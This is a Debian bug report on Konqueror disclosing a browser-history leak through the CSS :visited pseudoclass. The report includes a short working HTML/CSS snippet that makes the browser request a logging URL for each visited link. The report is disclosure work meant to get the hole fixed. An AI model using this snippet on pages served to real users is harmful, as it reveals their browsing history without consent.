Debian Bug report logs - #578253
CSS visited elements allow for disclosure of users browser history

Reply or subscribe to this bug.

Display info messages

Message #5 received at [email protected] (full text, mbox, reply):

From: [email protected]

To: Debian Bug Tracking System <[email protected]>

Subject: CSS visited elements allow for disclosure of users browser history

Date: Sun, 18 Apr 2010 10:51:19 +0100

Package: konqueror
Version: 4:4.3.4-1
Severity: normal

There is a "Disclosure of user information" security flaw in the konqueror
browser due to the implementation of support for CSS :visited pseudoclass 
elements. It is possible to specify a background-url attribute which will make
a request to the server if a particular link has been visited. Using this CSS
mechanism, it is possible for a hosting server to determine visited links
without using Javascript.

For example:

<style>
  a#link1:visited { background-image: url(/log?link1_was_visited); }
  a#link2:visited { background-image: url(/log?link2_was_visited); }
</style>
<a href="http://google.com" id="link1"> 
<a href="http://yahoo.com" id="link2"> 

If link1 (http://google.com) has been visited, the browser will make a request
back to the server to retrieve the background for the #link1 rule. By 
ppending a different URL argument to each rule we can determine which of the
links were visited. Please note that this requires no client-side scripting
whatsoever, and only relies on the availability of CSS.

The following website demonstrates a working exploit of this vulnerability:
http://www.whattheinternetknowsaboutyou.com/

Mark.

-- System Information:
Debian Release: squeeze/sid
  APT prefers testing
  APT policy: (60, 'testing'), (50, 'unstable')
Architecture: i386 (i386)

Kernel: Linux 2.6.26-2-486
Locale: LANG=en_GB, LC_CTYPE=en_GB (charmap=ISO-8859-1)
Shell: /bin/sh linked to /bin/dash

Versions of packages konqueror depends on:
ii  install-info              4.13a.dfsg.1-4 Manage installed documentation in 
ii  kdebase-bin               4:4.3.4-1      core binaries for the KDE 4 base m
ii  kdebase-data              4:4.3.4-1      shared data files for the KDE 4 ba
ii  kdebase-runtime           4:4.3.1-1      runtime components from the offici
ii  kdelibs5                  4:4.3.4-3      core libraries for all KDE 4 appli
ii  libc6                     2.10.2-2       GNU C Library: Shared libraries
ii  libkonq5                  4:4.3.4-1      core libraries for Konqueror
ii  libkonqsidebarplugin4     4:4.3.4-1      Konqueror sidebar plugin library
ii  libqt4-dbus               4:4.5.3-4      Qt 4 D-Bus module
ii  libqt4-qt3support         4:4.5.3-4      Qt 3 compatibility library for Qt 
ii  libqt4-xml                4:4.5.3-4      Qt 4 XML module
ii  libqtcore4                4:4.5.3-4      Qt 4 core module
ii  libqtgui4                 4:4.5.3-4      Qt 4 GUI module
ii  libstdc++6                4.4.2-9        The GNU Standard C++ Library v3
ii  libx11-6                  2:1.2.2-1      X11 client-side library

Versions of packages konqueror recommends:
ii  dolphin                       4:4.3.4-1  file manager for KDE 4
ii  konqueror-nsplugins           4:4.3.4-1  Netscape plugin support for Konque

Versions of packages konqueror suggests:
pn  konq-plugins                  <none>     (no description available)

-- no debconf information

Send a report that this bug log contains spam.